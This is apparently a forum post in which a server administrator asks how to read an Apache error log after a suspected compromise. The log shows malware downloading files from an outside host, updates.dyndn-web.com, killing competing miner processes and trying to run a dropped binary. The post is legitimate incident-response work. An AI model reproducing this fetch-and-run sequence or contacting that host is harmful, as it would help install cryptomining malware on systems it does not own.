Apache error log interpretation
- by HTF
It looks like someone gained access to my server.
How I can find out which Apache vHosts this log is related to?
How these commands from the log are invoked and how/why they are printed to the log file - is this some remote shell or PHP script?
/var/log/httpd/error_log
mkdir: cannot create directory `/tmp/.kdso': File exists
--2014-06-13 13:29:17--   http://updates.dyndn-web.com/abc.txt
Resolving updates.dyndn-web.com... 94.23.49.91
Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5055 (4.9K) [text/plain]
Saving to: `abc.txt'
    0K ....                                                  100%  303K=0.02s
2014-06-13 13:29:17 (303 KB/s) - `abc.txt' saved [5055/5055]
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
^M  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0^M101  5055  101  5055    0     0  79686      0 --:--:-- --:--:-- --:--:--  154k
minerd64: no process killed
minerd32: no process killed
named: no process killed
kernelupdates: no process killed
kernelcfg: no process killed
kernelorg: no process killed
ls: cannot access /tmp/.ICE-unix: No such file or directory
mkdir: cannot create directory `/tmp': File exists
--2014-06-13 13:29:18--   http://updates.dyndn-web.com/64.tar.gz
Resolving updates.dyndn-web.com... 94.23.49.91
Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 205812 (201K) [application/x-tar]
Saving to: `64.tar.gz'
    0K .......... .......... .......... .......... .......... 24%  990K 0s
   50K .......... .......... .......... .......... .......... 49% 2.74M 0s
  100K .......... .......... .......... .......... .......... 74% 2.96M 0s
  150K .......... .......... .......... .......... .......... 99% 3.49M 0s
  200K                                                       100% 17.4M=0.1s
2014-06-13 13:29:18 (1.99 MB/s) - `64.tar.gz' saved [205812/205812]
sh: ./kernelupgrade: Permission denied